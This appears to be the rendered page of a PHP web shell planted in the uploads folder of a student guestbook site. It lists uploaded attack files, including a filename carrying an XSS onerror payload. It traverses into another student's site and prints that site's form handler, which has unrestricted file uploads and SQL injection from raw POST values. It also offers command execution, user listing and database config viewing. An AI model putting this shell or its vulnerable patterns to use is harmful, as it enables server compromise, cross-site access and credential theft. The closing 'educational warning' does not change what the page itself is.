🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../574486.klas4s23.mid-ica.nl/public_html/Gastenlijst/form_connect.php

<?php
session_start(); // Sessie starten

include 'connection.php'; // Databaseverbinding
if ($conn->connect_error) {
    die("Verbinding mislukt: " . $conn->connect_error);
}

// Controleer of het formulier al is ingediend in deze sessie
if (!isset($_SESSION['form_submitted'])) {
    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["submit"])) {
        $naam = $_POST["naam"];
        $korte_text = $_POST["korte_text"];

        // Controleer of er een bestand is geΓΌpload en of er geen fouten zijn opgetreden
        if(isset($_FILES["afbeelding"]) && $_FILES["afbeelding"]["error"] == 0) {
            $afbeelding = $_FILES["afbeelding"]["name"];
            $afbeelding_tmp = $_FILES["afbeelding"]["tmp_name"];

            // Verplaats het geΓΌploade bestand naar een permanente locatie
            $destination = "uploads/" . $afbeelding;
            move_uploaded_file($afbeelding_tmp, $destination);
        } else {
            // Als er geen afbeelding is geΓΌpload, zet de afbeeldingsnaam op een standaardwaarde of sla een foutmelding op
            $afbeelding = "geen_afbeelding.jpg";
        }

        $sessie_id = session_id();
        $placement_date = date("Y-m-d H:i:s");

        // Controleer of de sessie-ID al bestaat in de database
        $checkQuery = "SELECT COUNT(*) as count FROM gb_messages WHERE sessie_id = '$sessie_id'";
        $result = $conn->query($checkQuery);
        $row = $result->fetch_assoc();

        if ($row['count'] > 0) {
            // Sessie-ID bestaat al, handle dit (bijwerken of invoer voorkomen)
            $updateQuery = "UPDATE gb_messages SET naam = '$naam', korte_text = '$korte_text', afbeelding = '$afbeelding' WHERE sessie_id = '$sessie_id'";
            if ($conn->query($updateQuery) === TRUE) {
                echo "Gegevens succesvol bijgewerkt!";
                $_SESSION['form_submitted'] = true;
                header("Location:http://574486.klas4s23.mid-ica.nl/Gastenlijst/index.php");
                exit;
            } else {
                echo "Fout bij bijwerken van gegevens: " . $conn->error;
            }

            // Optioneel: Je kunt het script hier beΓ«indigen of doorverwijzen naar een andere pagina om dubbele inhoud te voorkomen
            exit();
        }

        // Voeg gegevens toe aan de database
        $sql = "INSERT INTO gb_messages (naam, korte_text, afbeelding, sessie_id, placement_date) VALUES ('$naam', '$korte_text', '$afbeelding', '$sessie_id', '$placement_date')";

        if ($conn->query($sql) === TRUE) {
            echo "Gegevens succesvol toegevoegd!";
            $_SESSION['form_submitted'] = true;
        } else {
            echo "Fout bij toevoegen van gegevens: " . $conn->error;
        }   
        error_reporting(E_ALL);
        ini_set('display_errors', 1);
    }
}
?>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!